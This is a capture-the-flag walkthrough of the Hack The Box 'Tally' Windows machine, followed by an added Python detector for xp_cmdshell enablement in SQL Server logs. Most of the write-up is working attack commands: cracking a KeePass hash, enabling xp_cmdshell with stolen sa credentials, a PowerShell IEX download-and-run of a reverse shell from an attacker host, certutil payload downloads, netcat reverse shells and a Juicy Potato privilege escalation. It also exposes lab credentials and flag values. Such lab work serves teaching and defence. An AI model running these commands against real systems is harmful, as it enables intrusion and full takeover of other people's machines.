Service overview
$ nmapAutomator.sh -H 10.10.10.59 -t Full
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
|_http-generator: Microsoft SharePoint
|_http-server-header: Microsoft-IIS/10.0
| http-title: Home
|_Requested resource was http://10.10.10.59/_layouts/15/start.aspx#/default.aspx
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp open ccproxy-http?
1433/tcp open ms-sql-s Microsoft SQL Server 2016 13.00.1601.00; RTM
| ms-sql-ntlm-info:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-06-09T12:19:03
|_Not valid after: 2051-06-09T12:19:03
|_ssl-date: 2021-06-09T12:31:08+00:00; +4m10s from scanner time.
32844/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
| ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US
| Subject Alternative Name: DNS:localhost, DNS:tally
| Not valid before: 2017-09-17T22:51:16
|_Not valid after: 9999-01-01T00:00:00
|_ssl-date: 2021-06-09T12:31:08+00:00; +4m10s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
32846/tcp open storagecraft-image StorageCraft Image Manager
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49665/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 4m09s, deviation: 0s, median: 4m09s
| ms-sql-info:
| 10.10.10.59:1433:
| Version:
| name: Microsoft SQL Server 2016 RTM
| number: 13.00.1601.00
| Product: Microsoft SQL Server 2016
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-06-09T12:31:01
|_ start_date: 2021-06-09T12:18:38
Microsoft Sharepoint:
http://10.10.10.59/_layouts/viewlsts.aspx
FTP credentials:
http://10.10.10.59/Shared%20Documents/ftp-details.docx
FTP details
hostname: tally
workgroup: htb.local
password: UTDRSCH53c"$6hys
Please create your own user folder upon logging in
ftp_user:UTDRSCH53c"$6hys
FTP
Download all files from FTP:
$ cat ftp/_/User/Sarah/notes.txt
install sharepoint, replace orchard cms
uninstall sql server 2016 (not done yet)
Brute force
KeePass database ftp/_/User/Tim/Files/tim.kdbx
keepass2john tim.kdbx > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
=> simplementeyo
=> windows tally acct (share creds) Finance:Acc0unting
cisco:cisco123
pdf writer:64257-56525-54257-54734
$ smbclient -L //10.10.10.59 -U Finance
Sharename Type Comment
--------- ---- -------
ACCT Disk
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
$ cat ftp/_/User/Tim/Project/Log/do\ to.txt
To do:
Remove migration folder
Set secure share permissions
encrypted share creds:
password in keepass
Reverse Shell
smb: \zz_Migration\Binaries\New folder\> get tester.exe
$ strings tester.exe | grep db
db: orcharddb
uid: sa
pwd: GWE3V65#6KFH93@4GWTG2G
Serve the nishang reverse shell (shell.ps1) with a python HTTP server and listen with nc -lvnp 1234.
SQL connection:
$ sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G
exec sp_configure 'show advanced options', 1
go
reconfigure
go
exec sp_configure 'xp_cmdshell',1
go
reconfigure
go
xp_cmdshell "powershell IEX (New-Object Net.WebClient).downloadString('http://10.10.14.2/shell.ps1')"
go
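Defensive counterpart to the sp_configure chain above, added here and not part of the original writeup: a detector over SQL Server ERRORLOG lines that flags the 'show advanced options' -> 'xp_cmdshell' enable sequence on one spid. The message text follows what SQL Server logs on a configuration change; the excerpt, timestamps and spid values are constructed.

```python
import re
from typing import Dict, List

# Constructed ERRORLOG excerpt modelled on the sp_configure/RECONFIGURE chain used
# in the writeup; the timestamps and spid values are made up.
SAMPLE_ERRORLOG = """\
2021-06-09 12:30:01.10 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-06-09 12:30:02.33 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-06-09 12:30:40.02 spid57      Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.
2021-06-09 12:45:12.90 spid61      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

# One ERRORLOG line: "<timestamp> <spid> Configuration option '<name>' changed from <old> to <new>."
CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)
# Instance settings that, once enabled, let a SQL login run OS commands or load code.
OS_EXEC_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures", "clr enabled"}


def parse_config_changes(errorlog: str) -> List[Dict[str, str]]:
    """Return one dict per configuration-change line; unrelated lines are skipped."""
    events = []
    for line in errorlog.splitlines():
        m = CONFIG_CHANGE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def detect_xp_cmdshell_enablement(errorlog: str) -> List[str]:
    """Flag 'show advanced options' 0->1 (precursor) and any OS_EXEC option 0->1 (high),
    noting when the same spid did both, i.e. the exact enable chain seen in the writeup."""
    findings = []
    advanced_on = set()  # spids that have turned on 'show advanced options'
    for ev in parse_config_changes(errorlog):
        enabled = ev["old"] == "0" and ev["new"] == "1"
        disabled = ev["old"] == "1" and ev["new"] == "0"
        if ev["option"] == "show advanced options" and enabled:
            advanced_on.add(ev["spid"])
            findings.append(f"LOW  {ev['ts']} {ev['spid']}: advanced options exposed (precursor)")
        elif ev["option"] in OS_EXEC_OPTIONS and enabled:
            chain = " after enabling advanced options" if ev["spid"] in advanced_on else ""
            findings.append(f"HIGH {ev['ts']} {ev['spid']}: '{ev['option']}' enabled{chain}")
        elif ev["option"] in OS_EXEC_OPTIONS and disabled:
            findings.append(f"INFO {ev['ts']} {ev['spid']}: '{ev['option']}' disabled again")
    return findings


if __name__ == "__main__":
    print("\n".join(detect_xp_cmdshell_enablement(SAMPLE_ERRORLOG)))
```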
User flag
PS C:\users\sarah\desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::3069:672c:126c:970d
Link-local IPv6 Address . . . . . : fe80::3069:672c:126c:970d%5
IPv4 Address. . . . . . . . . . . : 10.10.10.59
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%5
10.10.10.2
Tunnel adapter isatap.{DF30D885-6F85-4AAC-A76D-2B78DC87B71C}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
PS C:\users\sarah\desktop> type user.txt
be72362e8dffeca2b42406d5d1c74bb1
Privilege escalation
> type "note to tim (draft).txt"
Hi Tim,
As discussed in the cybersec meeting, malware is often hidden in trusted executables in order to evade detection. I read somewhere that cmd.exe is a common target for backdooring, so I've gone ahead and disallowed any cmd.exe outside the Windows folder from executing.
Thanks,
Sarah
PS C:\users\sarah\desktop> type todo.txt
done:
install updates
check windows defender enabled
outstanding:
update intranet design
update server inventory
=> the latest updates are not installed, and the name cmd.exe cannot be used
Public exploit
https://www.exploit-db.com/exploits/42020
Rename cmd.exe to writeup.exe
> whoami /priv
SeImpersonatePrivilege Impersonate a client after authentication Enabled
=> juicy potato
> certutil -urlcache -f "http://10.10.14.2/nc.exe" nc.exe
> certutil -urlcache -f "http://10.10.14.2/jp.exe" jp.exe
nc -lnvp 1235
.\nc.exe 10.10.14.2 1235 -e cmd.exe
nc -lnvp 1236
(take the CLSID from https://ohpe.it/juicy-potato/CLSID/Windows_Server_2016_Standard/)
jp.exe -l 4321 -p C:\Users\Sarah\Desktop\nc.exe -a "10.10.14.2 1236 -e cmd.exe" -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820}
Root flag
C:\Users\Administrator\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::3069:672c:126c:970d
Link-local IPv6 Address . . . . . : fe80::3069:672c:126c:970d%5
IPv4 Address. . . . . . . . . . . : 10.10.10.59
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%5
10.10.10.2
Tunnel adapter isatap.{DF30D885-6F85-4AAC-A76D-2B78DC87B71C}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Users\Administrator\Desktop>type root.txt
608bb707348105911c8991108e523eda